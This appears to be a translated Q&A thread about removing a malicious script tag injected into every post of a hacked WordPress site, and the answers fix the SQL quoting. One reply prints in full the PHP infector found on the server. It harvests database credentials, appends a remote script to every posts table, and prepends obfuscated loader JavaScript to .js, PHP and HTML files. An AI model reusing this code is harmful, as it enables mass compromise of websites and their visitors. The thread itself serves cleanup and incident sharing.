如何在网站黑客攻击后从所有帖子中批量删除一行

时间：2020-11-06 作者：John Maguire

我的Wordpress网站被黑客入侵，每个帖子都有

<script src=\'https://crow.lowerthenskyactive.ga/m.js?n=ns1\' type=\'text/javascript\'></script>

添加到我需要删除的每个帖子的末尾。我有375个帖子需要删除我已经试过了

UPDATE wp_posts SET post_content = REPLACE (post_content, \'<p style="text-align: center;"><img src="http://i.imgur.com/picture.jpg" alt="" /></p>\', \'\');

从How to mass delete one line from all posts

并将其替换为以下查询我认为它与查询中的

UPDATE wp_posts SET post_content = REPLACE (post_content, \'<script src=\'https://crow.lowerthenskyactive.ga/m.js?n=ns1\' type=\'text/javascript\'></script>\', \'\');

但我得到以下错误

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'https://crow.lowerthenskyactive.ga/m.js?n=ns1\' type=\'text/javascript\'></script>\'\' at line 1

当我运行查询时，我认为它与\' 在脚本标记中，但我不知道如何删除它们。

3 个回复

最合适的回答,由SO网友:uPrompt 整理而成

Try this:

UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src=\'https://crow.lowerthenskyactive.ga/m.js?n=ns1\' type=\'text/javascript\'></script>","");

SO网友:Rick Hellewell

您的原始代码在一个单引号内有一个单引号。这就是@uprompt的代码起作用的原因。。。。他使用双引号将要在命令中搜索的文本括起来。

SO网友:TheRealThor

我被同一个脚本入侵，只是URL不同。

<script src="https://drake.strongcapitalads.ga/m.js?n=ns1" type="text/javascript2></script>

似乎该组有各种服务器在其控制下。我已经发过虐待电子邮件了。

不要忘记，恶意软件也已添加到您的所有*。js文件和其他文件。以下是上传到我的服务器上的恶意脚本，它为帖子和其他文件创造了机会：

<?php echo "ssqqss>>>";
error_reporting(0);
ini_set(\'display_errors\',0);
ini_set(\'max_execution_time\', \'300\');
ini_set(\'memory_limit\', \'-1\');
$count = 0;

search_file_js($_SERVER[\'DOCUMENT_ROOT\']."/../../../../../../../../",".js");
echo "\\r\\n
jssss count:: ". $count;
echo "<<<<ssqqss";

  
function get_var_reg($pat,$text) {
    
    if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
    {
        return $matches[1][0];
    }
        
    return "";
}
function search_file_ms($dir,$file_to_search){

$search_array = array();

$files = scandir($dir);

if($files == false) {
    
    $dir = substr($dir, 0, -3);
    if (strpos($dir, \'../\') !== false) {
        
        @search_file_ms( $dir,$file_to_search);
        return;
    }
    if($dir == $_SERVER[\'DOCUMENT_ROOT\']."/") {
        
        @search_file_ms( $dir,$file_to_search);
        return;
    }
}

foreach($files as $key => $value){


    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);

    if(!is_dir($path)) {
        if (strpos($value,$file_to_search) !== false) {
        
            show_sitenames($path);
            
            
            
        }

    } else if($value != "." && $value != "..") {

        @search_file_ms($path, $file_to_search);

    }  
 } 
}
function show_sitenames($file){
    $content = @file_get_contents($file);
    if(strpos($content, "DB_NAME") !== false) {
    
    
    $db = get_var_reg("\'DB_NAME\'.*?,.*?[\'|\\"](.*?)[\'|\\"]",$content);
    $host = get_var_reg("\'DB_HOST\'.*?,.*?[\'|\\"](.*?)[\'|\\"]",$content);
    $user = get_var_reg("\'DB_USER\'.*?,.*?[\'|\\"](.*?)[\'|\\"]",$content);
    $pass = get_var_reg("\'DB_PASSWORD\'.*?,.*?[\'|\\"](.*?)[\'|\\"]",$content);


// Create connection
$conn = new mysqli($host, $user, $pass);

// Check connection
if ($conn->connect_error) {
 
} else { 


$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE \'%post%\'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
        $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
    $result2 = $conn->query($q2);
    if ($result2->num_rows > 0) {
        while($row2 = $result2->fetch_assoc()) {
            $val = $row2[\'post_content\'];
            if(strpos($val, "drake.strongcapitalads.ga") === false){
                if(strpos($val, "drake.strongcapitalads.ga") === false){
                    
                
                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\\"<script src=\'https://drake.strongcapitalads.ga/m.js?n=ns1\' type=\'text/javascript\'></script>\\") WHERE post_content NOT LIKE \'%drake.strongcapitalads.ga%\'";
                    $conn->query($q3);
                    echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
                
                } else {
                
                }

            } 
        }
    } else {
    }
    }
} else {
}
$conn->close();
}
}
}

function search_file($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
    
    $dir = substr($dir, 0, -3);
    if (strpos($dir, \'../\') !== false) {
        
        @search_file( $dir,$file_to_search);
        return;
    }
    if($dir == $_SERVER[\'DOCUMENT_ROOT\']."/") {
        
        @search_file( $dir,$file_to_search);
        return;
    }
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
    if(!is_dir($path)) {
        if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

        make_it($path);

    } }else if($value != "." && $value != "..") {

        search_file($path, $file_to_search);

    }  
 } 

}

function search_file_index($dir,$file_to_search){

$files = @scandir($dir);

if($files == false) {
    
    $dir = substr($dir, 0, -3);
    if (strpos($dir, \'../\') !== false) {
        
        search_file_index( $dir,$file_to_search);
        return;
    }
    if($dir == $_SERVER[\'DOCUMENT_ROOT\']."/") {
        
        search_file_index( $dir,$file_to_search);
        return;
    }
}

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
    if(!is_dir($path)) {
        if (strpos($value,$file_to_search) !== false && (strpos($value,".ph") !== false || strpos($value,".htm")) !== false) {

        make_it_index($path);

    } }else if($value != "." && $value != "..") {

        search_file_index($path, $file_to_search);

    }  
 } 

}
function search_file_js($dir,$file_to_search){

$files = @scandir($dir);
if($files == false) {
    
    $dir = substr($dir, 0, -3);
    if (strpos($dir, \'../\') !== false) {
        
        @search_file_js( $dir,$file_to_search);
        return;
    }
    if($dir == $_SERVER[\'DOCUMENT_ROOT\']."/") {
        
        @search_file_js( $dir,$file_to_search);
        return;
    }
} else {

foreach($files as $key => $value){

    $path = realpath($dir.DIRECTORY_SEPARATOR.$value);
    
    if(!is_dir($path)) {
        if (strpos($value,$file_to_search) !== false && (strpos($value,".js") !== false)) {
global $count;
$count++;
        make_it_js($path);

    } }else if($value != "." && $value != "..") {

        search_file_js($path, $file_to_search);

    }  
 } 
 }

}

function make_it_js($f){
            $g = file_get_contents($f);
            
                                        

if (strpos($g, \'100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97\') !== false) {

} else {

$l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
$g = file_get_contents($f);
$g = $l2.$g;
@system(\'chmod 777 \'.$f);
@file_put_contents($f,$g);

}

            
}
function make_it_index($f){
$g = file_get_contents($f);
if (strpos($g, \'100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97\') !== false || strpos($g, \'drake.strongcapitalads.ga\') !== false) {

} else {
$l2 = "<script type=\'text/javascript\' src=\'https://drake.strongcapitalads.ga/m.js?n=nb5\'></script>";
$g = file_get_contents($f);
$g = $l2.$g;

@system(\'chmod 777 \'.$f);
@file_put_contents($f,$g);
echo "in:".$f."\\r\\n";


            }
}

function make_it($f){
$g = file_get_contents($f);
if (strpos($g, \'100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97\') !== false) {

} else {
$l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,114,97,107,101,46,115,116,114,111,110,103,99,97,112,105,116,97,108,97,100,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (strpos($g, \'<head>\') !== false) {
$b = str_replace("<head>","<head>".$l2,$g);
@system(\'chmod 777 \'.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\\r\\n";
}
if (strpos($g, \'</head>\') !== false) {
$b = str_replace("</head>",$l2."</head>",$g);
@system(\'chmod 777 \'.$f);
@file_put_contents($f,$b);
echo "hh:".$f."\\r\\n";
}


            }
}

小码农CODE

如何在网站黑客攻击后从所有帖子中批量删除一行

相关推荐

ACF的WP_QUERY结果问题